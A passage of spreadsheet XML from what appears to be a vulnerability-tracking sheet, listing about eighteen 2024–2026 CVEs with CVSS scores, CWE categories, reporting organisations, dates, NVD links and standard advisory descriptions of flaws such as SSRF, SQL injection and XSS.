          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1142" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1142" s="5" t="inlineStr"/>
      <c r="H1142" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I1142" s="5" t="inlineStr"/>
      <c r="J1142" s="5" t="inlineStr"/>
      <c r="K1142" s="5" t="inlineStr"/>
      <c r="L1142" s="5" t="inlineStr"/>
      <c r="M1142" s="5" t="inlineStr"/>
      <c r="N1142" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1142" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1142" s="5" t="inlineStr"/>
      <c r="Q1142" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R1142" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in taisan tarzan-cms 1.0.0. This issue affects the function openConnection of the file com/tarzan/cms/modules/admin/service/biz/ThemeService.java of the component Theme Download Function. Executing a manipulation of the argument httpUrl can lead to server-side request forgery. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="S1142" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90710</t>
        </is>
      </c>
    </row>
    <row r="1143">
      <c r="A1143" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1143" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1143" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90995</t>
        </is>
      </c>
      <c r="D1143" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1143" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1143" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G1143" s="5" t="inlineStr"/>
      <c r="H1143" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1143" s="5" t="inlineStr"/>
      <c r="J1143" s="5" t="inlineStr"/>
      <c r="K1143" s="5" t="inlineStr"/>
      <c r="L1143" s="5" t="inlineStr"/>
      <c r="M1143" s="5" t="inlineStr"/>
      <c r="N1143" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1143" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1143" s="5" t="inlineStr"/>
      <c r="Q1143" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="R1143" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in SSSD (System Security Services Daemon). A local attacker with privileges to connect to the PAM (Pluggable Authentication Modules) responder socket can send a specially crafted protocol request. If the `pam_app_services` configuration is enabled and the service item is omitted from the request, a NULL pointer dereference can occur. This vulnerability leads to a denial of service, causing the PAM responder to crash and disrupt authentication services.</t>
        </is>
      </c>
      <c r="S1143" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90995</t>
        </is>
      </c>
    </row>
    <row r="1144">
      <c r="A1144" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1144" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1144" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92366</t>
        </is>
      </c>
      <c r="D1144" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1144" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1144" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1144" s="5" t="inlineStr"/>
      <c r="H1144" s="5" t="inlineStr"/>
      <c r="I1144" s="5" t="inlineStr"/>
      <c r="J1144" s="5" t="inlineStr"/>
      <c r="K1144" s="5" t="inlineStr"/>
      <c r="L1144" s="5" t="inlineStr"/>
      <c r="M1144" s="5" t="inlineStr"/>
      <c r="N1144" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1144" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1144" s="5" t="inlineStr"/>
      <c r="Q1144" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="R1144" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in code-projects Matrimonial System 1.0. This affects an unknown part of the file /search.php of the component Regular Search. This manipulation of the argument sex/mothertongue/maritialstatus/country/state/religion/agemin/agemax causes sql injection. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized.</t>
        </is>
      </c>
      <c r="S1144" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92366</t>
        </is>
      </c>
    </row>
    <row r="1145">
      <c r="A1145" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1145" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1145" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92380</t>
        </is>
      </c>
      <c r="D1145" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1145" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1145" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1145" s="5" t="inlineStr"/>
      <c r="H1145" s="5" t="inlineStr"/>
      <c r="I1145" s="5" t="inlineStr"/>
      <c r="J1145" s="5" t="inlineStr"/>
      <c r="K1145" s="5" t="inlineStr"/>
      <c r="L1145" s="5" t="inlineStr"/>
      <c r="M1145" s="5" t="inlineStr"/>
      <c r="N1145" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1145" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1145" s="5" t="inlineStr"/>
      <c r="Q1145" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R1145" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in WuzhiCMS up to 4.1.0. The impacted element is the function ckditor::saveRemote of the file coreframe/app/attachment/index.php of the component Remote Image Fetch. This manipulation of the argument source[] causes server-side request forgery. The attack can be initiated remotely. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="S1145" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92380</t>
        </is>
      </c>
    </row>
    <row r="1146">
      <c r="A1146" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1146" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1146" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92405</t>
        </is>
      </c>
      <c r="D1146" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1146" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1146" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1146" s="5" t="inlineStr"/>
      <c r="H1146" s="5" t="inlineStr"/>
      <c r="I1146" s="5" t="inlineStr"/>
      <c r="J1146" s="5" t="inlineStr"/>
      <c r="K1146" s="5" t="inlineStr"/>
      <c r="L1146" s="5" t="inlineStr"/>
      <c r="M1146" s="5" t="inlineStr"/>
      <c r="N1146" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1146" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1146" s="5" t="inlineStr"/>
      <c r="Q1146" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="R1146" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in SourceCodester Inventory and Monitoring System 1.0. The affected element is an unknown function of the file /index.php. Such manipulation of the argument Username leads to sql injection. The attack may be launched remotely. The exploit has been disclosed publicly and may be used.</t>
        </is>
      </c>
      <c r="S1146" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92405</t>
        </is>
      </c>
    </row>
    <row r="1147">
      <c r="A1147" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1147" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1147" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-23176</t>
        </is>
      </c>
      <c r="D1147" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E1147" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1147" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G1147" s="5" t="inlineStr"/>
      <c r="H1147" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1147" s="5" t="inlineStr"/>
      <c r="J1147" s="5" t="inlineStr"/>
      <c r="K1147" s="5" t="inlineStr"/>
      <c r="L1147" s="5" t="inlineStr"/>
      <c r="M1147" s="5" t="inlineStr"/>
      <c r="N1147" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1147" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1147" s="5" t="inlineStr"/>
      <c r="Q1147" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1147" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in the MassMessage extension in MediaWiki before 1.40.2. For a Special:MassMessage?uselang=x-xss URL, the i18n key massmessage-form-page-help allows XSS.</t>
        </is>
      </c>
      <c r="S1147" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-23176</t>
        </is>
      </c>
    </row>
    <row r="1148">
      <c r="A1148" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1148" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1148" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12758</t>
        </is>
      </c>
      <c r="D1148" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E1148" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1148" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G1148" s="5" t="inlineStr"/>
      <c r="H1148" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1148" s="5" t="inlineStr"/>
      <c r="J1148" s="5" t="inlineStr"/>
      <c r="K1148" s="5" t="inlineStr"/>
      <c r="L1148" s="5" t="inlineStr"/>
      <c r="M1148" s="5" t="inlineStr"/>
      <c r="N1148" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1148" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1148" s="5" t="inlineStr"/>
      <c r="Q1148" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1148" s="5" t="inlineStr">
        <is>
          <t>IBM Cloud Pak for Business Automation could allow a remote attacker to bypass authorization and invoke restricted endpoints due to improper validation of HTTP headers.</t>
        </is>
      </c>
      <c r="S1148" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12758</t>
        </is>
      </c>
    </row>
    <row r="1149">
      <c r="A1149" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1149" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1149" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12766</t>
        </is>
      </c>
      <c r="D1149" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E1149" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1149" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G1149" s="5" t="inlineStr"/>
      <c r="H1149" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1149" s="5" t="inlineStr"/>
      <c r="J1149" s="5" t="inlineStr"/>
      <c r="K1149" s="5" t="inlineStr"/>
      <c r="L1149" s="5" t="inlineStr"/>
      <c r="M1149" s="5" t="inlineStr"/>
      <c r="N1149" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1149" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1149" s="5" t="inlineStr"/>
      <c r="Q1149" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R1149" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.2 is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks.</t>
        </is>
      </c>
      <c r="S1149" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12766</t>
        </is>
      </c>
    </row>
    <row r="1150">
      <c r="A1150" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1150" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1150" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13407</t>
        </is>
      </c>
      <c r="D1150" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E1150" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1150" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G1150" s="5" t="inlineStr"/>
      <c r="H1150" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1150" s="5" t="inlineStr"/>
      <c r="J1150" s="5" t="inlineStr"/>
      <c r="K1150" s="5" t="inlineStr"/>
      <c r="L1150" s="5" t="inlineStr"/>
      <c r="M1150" s="5" t="inlineStr"/>
      <c r="N1150" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1150" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1150" s="5" t="inlineStr"/>
      <c r="Q1150" s="5" t="inlineStr">
        <is>
          <t>CWE-116</t>
        </is>
      </c>
      <c r="R1150" s="5" t="inlineStr">
        <is>
          <t>The Royal Elementor Addons WordPress plugin before 1.7.1067 does not properly sanitize and escape values submitted through its form widget before including them in the body of administrator notification emails, allowing unauthenticated attackers to inject arbitrary HTML into emails sent to the site administrator on form submission.</t>
        </is>
      </c>
      <c r="S1150" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13407</t>
        </is>
      </c>
    </row>
    <row r="1151">
      <c r="A1151" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1151" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1151" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15887</t>
        </is>
      </c>
      <c r="D1151" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E1151" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1151" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G1151" s="5" t="inlineStr"/>
      <c r="H1151" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1151" s="5" t="inlineStr"/>
      <c r="J1151" s="5" t="inlineStr"/>
      <c r="K1151" s="5" t="inlineStr"/>
      <c r="L1151" s="5" t="inlineStr"/>
      <c r="M1151" s="5" t="inlineStr"/>
      <c r="N1151" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1151" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1151" s="5" t="inlineStr"/>
      <c r="Q1151" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R1151" s="5" t="inlineStr">
        <is>
          <t>IBM WebSphere Application Server 9.0, and 8.5 is affected by blind server-side request forgery when processing SOAP requests.</t>
        </is>
      </c>
      <c r="S1151" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15887</t>
        </is>
      </c>
    </row>
    <row r="1152">
      <c r="A1152" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1152" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1152" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16186</t>
        </is>
      </c>
      <c r="D1152" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E1152" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1152" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G1152" s="5" t="inlineStr"/>
      <c r="H1152" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1152" s="5" t="inlineStr"/>
      <c r="J1152" s="5" t="inlineStr"/>
      <c r="K1152" s="5" t="inlineStr"/>
      <c r="L1152" s="5" t="inlineStr"/>
      <c r="M1152" s="5" t="inlineStr"/>
      <c r="N1152" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1152" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1152" s="5" t="inlineStr"/>
      <c r="Q1152" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1152" s="5" t="inlineStr">
        <is>
          <t>IBM WebSphere Application Server 9.0, and 8.5 is affected by a reflected cross-site scripting vulnerability.</t>
        </is>
      </c>
      <c r="S1152" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16186</t>
        </is>
      </c>
    </row>
    <row r="1153">
      <c r="A1153" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1153" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1153" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17047</t>
        </is>
      </c>
      <c r="D1153" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E1153" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1153" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G1153" s="5" t="inlineStr"/>
      <c r="H1153" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1153" s="5" t="inlineStr"/>
      <c r="J1153" s="5" t="inlineStr"/>
      <c r="K1153" s="5" t="inlineStr"/>
      <c r="L1153" s="5" t="inlineStr"/>
      <c r="M1153" s="5" t="inlineStr"/>
      <c r="N1153" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1153" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1153" s="5" t="inlineStr"/>
      <c r="Q1153" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="R1153" s="5" t="inlineStr">
        <is>
          <t>IBM Db2 Mirror for i 7.4, 7.5, and 7.6 could allow a remote attacker to obtain sensitive information due to improper request validation.</t>
        </is>
      </c>
      <c r="S1153" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17047</t>
        </is>
      </c>
    </row>
    <row r="1154">
      <c r="A1154" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1154" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1154" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17628</t>
        </is>
      </c>
      <c r="D1154" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E1154" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1154" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G1154" s="5" t="inlineStr"/>
      <c r="H1154" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1154" s="5" t="inlineStr"/>
      <c r="J1154" s="5" t="inlineStr"/>
      <c r="K1154" s="5" t="inlineStr"/>
      <c r="L1154" s="5" t="inlineStr"/>
      <c r="M1154" s="5" t="inlineStr"/>
      <c r="N1154" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1154" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1154" s="5" t="inlineStr"/>
      <c r="Q1154" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R1154" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.10.2 could allow a remote authenticated attacker to change the password of an account due to improper authentication.</t>
        </is>
      </c>
      <c r="S1154" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17628</t>
        </is>
      </c>
    </row>
    <row r="1155">
      <c r="A1155" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1155" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1155" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19273</t>
        </is>
      </c>
      <c r="D1155" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E1155" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1155" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G1155" s="5" t="inlineStr"/>
      <c r="H1155" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1155" s="5" t="inlineStr"/>
      <c r="J1155" s="5" t="inlineStr"/>
      <c r="K1155" s="5" t="inlineStr"/>
      <c r="L1155" s="5" t="inlineStr"/>
      <c r="M1155" s="5" t="inlineStr"/>
      <c r="N1155" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1155" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1155" s="5" t="inlineStr"/>
      <c r="Q1155" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R1155" s="5" t="inlineStr">
        <is>
          <t>IBM Sterling B2B Integrator 6.2.0.0 through 6.2.0.6_2, 6.2.1.0 - 6.2.1.2, 6.2.2.0 - 6.2.2.1 and IBM Sterling File Gateway 6.2.0.0 through 6.2.0.6_2, 6.2.1.0 - 6.2.1.2, 6.2.2.0 - 6.2.2.1 Standard Edition could allow a remote authenticated attacker to bypass security restrictions due to improper authentication.</t>
        </is>
      </c>
      <c r="S1155" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19273</t>
        </is>
      </c>
    </row>
    <row r="1156">
      <c r="A1156" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1156" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1156" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-40635</t>
        </is>
      </c>
      <c r="D1156" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E1156" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1156" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G1156" s="5" t="inlineStr"/>
      <c r="H1156" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1156" s="5" t="inlineStr"/>
      <c r="J1156" s="5" t="inlineStr"/>
      <c r="K1156" s="5" t="inlineStr">
        <is>
          <t>dell:powerscale_onefs</t>
        </is>
      </c>
      <c r="L1156" s="5" t="inlineStr"/>
      <c r="M1156" s="5" t="inlineStr"/>
      <c r="N1156" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1156" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1156" s="5" t="inlineStr"/>
      <c r="Q1156" s="5" t="inlineStr">
        <is>
          <t>CWE-377</t>
        </is>
      </c>
      <c r="R1156" s="5" t="inlineStr">
        <is>
          <t>Dell PowerScale OneFS versions 9.12.0.0 through 9.13.1.0 contain an Insecure Temporary File vulnerability. A low privileged remote attacker could potentially exploit this vulnerability, leading to denial of service and information tampering.</t>
        </is>
      </c>
      <c r="S1156" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-40635</t>
        </is>
      </c>
    </row>
    <row r="1157">
      <c r="A1157" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1157" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1157" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78415</t>
        </is>
      </c>
      <c r="D1157" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E1157" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1157" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G1157" s="5" t="inlineStr"/>
      <c r="H1157" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1157" s="5" t="inlineStr"/>
      <c r="J1157" s="5" t="inlineStr"/>
      <c r="K1157" s="5" t="inlineStr"/>
      <c r="L1157" s="5" t="inlineStr"/>
      <c r="M1157" s="5" t="inlineStr"/>
      <c r="N1157" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1157" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1157" s="5" t="inlineStr"/>
      <c r="Q1157" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1157" s="5" t="inlineStr">
        <is>
          <t>IBM Sterling Secure Proxy 6.2.0.0 through 6.2.1.2 could allow a remote authenticated attacker to perform UI spoofing and phishing attacks due to improper neutralization of user-supplied HTML markup.</t>
        </is>
      </c>
      <c r="S1157" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78415</t>
        </is>
      </c>
    </row>
    <row r="1158">
      <c r="A1158" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1158" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1158" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-7884</t>
        </is>
      </c>
      <c r="D1158" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E1158" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1158" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G1158" s="5" t="inlineStr"/>
      <c r="H1158" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1158" s="5" t="inlineStr"/>
      <c r="J1158" s="5" t="inlineStr"/>
      <c r="K1158" s="5" t="inlineStr"/>
      <c r="L1158" s="5" t="inlineStr"/>
      <c r="M1158" s="5" t="inlineStr"/>
      <c r="N1158" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1158" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1158" s="5" t="inlineStr"/>
      <c r="Q1158" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1158" s="5" t="inlineStr">
        <is>
          <t>IBM Cognos Analytics 12.1.0 through 12.1.3 FP1, and 12.0.4 through 12.0.4 FP2 allows a non-privileged user to edit their given name and surname to include malicious JavaScript code. When an administrator later accesses the user account management panel and views that user's permissions, the malicious JavaScript code is executed. This could result in the cookies from the administrator being compromised.</t>
        </is>
      </c>
      <c r="S1158" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-7884</t>
        </is>
      </c>
    </row>
    <row r="1159">
      <c r="A1159" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1159" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1159" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84397</t>
        </is>
      </c>
      <c r="D1159" s="5" t="n">
        <v>5.4</v>
      </c>
